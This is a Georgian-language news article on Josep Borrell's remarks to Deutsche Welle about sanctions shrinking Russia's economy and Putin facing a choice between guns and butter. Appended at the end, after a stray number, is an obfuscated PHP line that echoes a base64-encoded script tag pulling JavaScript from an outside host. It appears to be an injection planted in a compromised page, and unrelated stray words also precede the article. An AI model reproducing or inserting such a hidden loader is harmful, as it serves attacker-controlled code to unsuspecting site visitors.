celsiusi
ავერსი შნაიდერი

ევროკავშირის საგარეო ქმედებათა სამსახურის ხელმძღვანელის, ჯოზეფ ბორელის განცხადებით, ვლადიმერ პუტინს მალე მოუწევს არჩევანის გაკეთება იარაღსა და ხალხისთვის კარაქის მიწოდებას შორის. ამის შესახებ განცხადება ჯოზეფ ბორელმა გერმანულ „დოიჩე ველესთან“ ინტერვიუში გააკეთა.

ევროკავშირის უმაღლესმა წარმომადგენელმა საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში უარყო მოსაზრება, რომ რუსეთის ეკონომიკა საერთაშორისო სანქციების შედეგად არ დაზარალებულა, მაშინ, როდესაც ევროპელი მომხმარებლები უკვე გრძნობენ ენერგორესურსებზე გაზრდილი ფასების ტვირთს. ბორელის თქმით, რუსული ომის მანქანას სჭირდება არა მხოლოდ ფული, არამედ ტექნოლოგიებიც.

„შეხედეთ რუსულ ტანკებს, რომლებსაც ჭურვები მოხვდა და თქვენ დაინახავთ, თუ რამდენი ელექტრონული კომპონენტია ამ ტანკში, რომელთა უმრავლესობა დასავლეთშია წარმოებული. მათ ამ კომპონენტებთან წვდომა აღარ ექნებათ“, – განაცხადა ბორელმა.

მისივე თქმით, 2022 წელს რუსეთის მთლიანი შიდა პროდუქტი 10 %-ით შემცირდება და ეს რეცესიას გამოიწვევს.

„ძალიან მალე პუტინს მოუწევს არჩევანის გაკეთება იარაღსა და ხალხისთვის კარაქის მიწოდებას შორის“, – განაცხადა ბორელმა.

ევროკავშირის საგარეო პოლიტიკური უწყების ხელმძღვანელი ასევე აცხადებს, რომ უკრაინაში ომის დაწყებიდან ევროპამ რუსული გაზის შესყიდვა მნიშვნელოვნად შეამცირა, თუმცა ერთ დღეში რუსული ბუნებრივი აირის შესყიდვის სრულად შეწყვეტის მოთხოვნა შეუძლებელია.

„ჩვენს სასწაულს ვერ მოვახდენთ“, – განაცხადა ჯოზეფ ბორელმა.

647
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");